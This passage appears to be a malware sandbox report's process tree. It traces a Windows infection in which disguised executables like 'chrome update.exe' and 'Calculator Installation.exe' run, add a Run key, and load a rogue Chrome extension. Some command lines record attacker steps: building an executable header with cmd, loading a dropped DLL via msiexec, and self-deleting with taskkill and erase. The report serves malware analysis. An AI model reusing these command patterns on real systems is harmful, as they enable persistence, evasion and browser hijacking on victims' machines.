                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                      13⤵
                                                                                                                        PID:8464
                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                        msiexec -Y ..\lXQ2g.WC
                                                                                                                        13⤵
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:9416
                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                  taskkill -f -iM "search_hyperfs_206.exe"
                                                                                                                  10⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:4688
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4284
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
                                                                                                              8⤵
                                                                                                                PID:1040
                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                  taskkill /im "setup.exe" /f
                                                                                                                  9⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:1696
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\chrome update.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\chrome update.exe"
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:5052
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                8⤵
                                                                                                                • Loads dropped DLL
                                                                                                                PID:6408
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=C:\Users\Admin\AppData\Roaming\System\4vp1w1wz.ozu
                                                                                                                  9⤵
                                                                                                                  • Enumerates system info in registry
                                                                                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                  PID:7484
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffc6a7c4f50,0x7ffc6a7c4f60,0x7ffc6a7c4f70
                                                                                                                    10⤵
                                                                                                                      PID:7416
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1900 /prefetch:8
                                                                                                                      10⤵
                                                                                                                        PID:6888
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2624 /prefetch:1
                                                                                                                        10⤵
                                                                                                                          PID:4176
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2616 /prefetch:1
                                                                                                                          10⤵
                                                                                                                            PID:7872
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1888 /prefetch:8
                                                                                                                            10⤵
                                                                                                                              PID:7928
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1840 /prefetch:2
                                                                                                                              10⤵
                                                                                                                                PID:7148
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
                                                                                                                                10⤵
                                                                                                                                  PID:8492
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:1
                                                                                                                                  10⤵
                                                                                                                                    PID:8628
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4636 /prefetch:8
                                                                                                                                    10⤵
                                                                                                                                      PID:8868
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4512 /prefetch:8
                                                                                                                                      10⤵
                                                                                                                                        PID:8860
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5008 /prefetch:8
                                                                                                                                        10⤵
                                                                                                                                          PID:8136
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4840 /prefetch:8
                                                                                                                                          10⤵
                                                                                                                                            PID:7916
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4852 /prefetch:8
                                                                                                                                            10⤵
                                                                                                                                              PID:8028
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5432 /prefetch:8
                                                                                                                                              10⤵
                                                                                                                                                PID:9000
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5728 /prefetch:8
                                                                                                                                                10⤵
                                                                                                                                                  PID:2104
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4528 /prefetch:8
                                                                                                                                                  10⤵
                                                                                                                                                    PID:7696
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --disable-gpu-compositing --lang=en-US --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:1
                                                                                                                                                    10⤵
                                                                                                                                                      PID:8500
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6116 /prefetch:8
                                                                                                                                                      10⤵
                                                                                                                                                        PID:4064
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6132 /prefetch:1
                                                                                                                                                        10⤵
                                                                                                                                                          PID:4000
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5460 /prefetch:8
                                                                                                                                                          10⤵
                                                                                                                                                            PID:10156
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5984 /prefetch:8
                                                                                                                                                            10⤵
                                                                                                                                                              PID:9372
                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5832 /prefetch:2
                                                                                                                                                              10⤵
                                                                                                                                                                PID:9924
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5572 /prefetch:8
                                                                                                                                                                10⤵
                                                                                                                                                                  PID:4708
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:8
                                                                                                                                                                  10⤵
                                                                                                                                                                    PID:9936
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5472 /prefetch:8
                                                                                                                                                                    10⤵
                                                                                                                                                                      PID:9920
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5984 /prefetch:8
                                                                                                                                                                      10⤵
                                                                                                                                                                        PID:9908
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5420 /prefetch:8
                                                                                                                                                                        10⤵
                                                                                                                                                                          PID:7948
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1828,1717981873005375559,2806580785620796605,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8
                                                                                                                                                                          10⤵
                                                                                                                                                                            PID:7748
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      PID:3632
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                        8⤵
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                        PID:4172
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--XUwKgV"
                                                                                                                                                                          9⤵
                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                          PID:9436
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffc6ab2dec0,0x7ffc6ab2ded0,0x7ffc6ab2dee0
                                                                                                                                                                            10⤵
                                                                                                                                                                              PID:6436
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff7f2579e70,0x7ff7f2579e80,0x7ff7f2579e90
                                                                                                                                                                                11⤵
                                                                                                                                                                                  PID:7376
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1800,12061452444307322620,15510141085330158131,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9436_336503766" --mojo-platform-channel-handle=1876 /prefetch:8
                                                                                                                                                                                10⤵
                                                                                                                                                                                  PID:5344
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1800,12061452444307322620,15510141085330158131,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9436_336503766" --mojo-platform-channel-handle=1864 /prefetch:8
                                                                                                                                                                                  10⤵
                                                                                                                                                                                    PID:5368
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1800,12061452444307322620,15510141085330158131,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9436_336503766" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2220 /prefetch:1
                                                                                                                                                                                    10⤵
                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                    PID:4952
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1800,12061452444307322620,15510141085330158131,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9436_336503766" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2472 /prefetch:1
                                                                                                                                                                                    10⤵
                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                    PID:4968
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1800,12061452444307322620,15510141085330158131,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9436_336503766" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1816 /prefetch:2
                                                                                                                                                                                    10⤵
                                                                                                                                                                                      PID:8988
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1800,12061452444307322620,15510141085330158131,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9436_336503766" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3172 /prefetch:2
                                                                                                                                                                                      10⤵
                                                                                                                                                                                        PID:9976
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1800,12061452444307322620,15510141085330158131,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9436_336503766" --mojo-platform-channel-handle=3240 /prefetch:8
                                                                                                                                                                                        10⤵
                                                                                                                                                                                          PID:5560
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1800,12061452444307322620,15510141085330158131,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9436_336503766" --mojo-platform-channel-handle=3652 /prefetch:8
                                                                                                                                                                                          10⤵
                                                                                                                                                                                            PID:8216
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1800,12061452444307322620,15510141085330158131,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9436_336503766" --mojo-platform-channel-handle=2788 /prefetch:8
                                                                                                                                                                                            10⤵
                                                                                                                                                                                              PID:10544
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1800,12061452444307322620,15510141085330158131,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9436_336503766" --mojo-platform-channel-handle=2784 /prefetch:8
                                                                                                                                                                                              10⤵
                                                                                                                                                                                                PID:10792
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1800,12061452444307322620,15510141085330158131,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9436_336503766" --mojo-platform-channel-handle=1644 /prefetch:8
                                                                                                                                                                                                10⤵
                                                                                                                                                                                                  PID:10688
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\liangzhang-game.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\liangzhang-game.exe"
                                                                                                                                                                                            7⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:4020
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\chrome2.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
                                                                                                                                                                                            7⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:5476
                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 5476 -s 1508
                                                                                                                                                                                              8⤵
                                                                                                                                                                                              • Program crash
                                                                                                                                                                                              PID:7508
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\chrome3.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
                                                                                                                                                                                            7⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:5640
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                                                                                                                            7⤵
                                                                                                                                                                                              PID:5952
                                                                                                                                                                                              • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                  PID:6660
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\chrome1.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\chrome1.exe"
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                PID:5144
                                                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 5144 -s 1512
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                  PID:1560
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Fri2058e26838.exe
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:372
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri2058e26838.exe
                                                                                                                                                                                              Fri2058e26838.exe
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:2240
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Fri209e1eb19c.exe /mixtwo
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:348
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri209e1eb19c.exe
                                                                                                                                                                                                Fri209e1eb19c.exe /mixtwo
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                PID:2364
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri209e1eb19c.exe
                                                                                                                                                                                                  Fri209e1eb19c.exe /mixtwo
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:2528
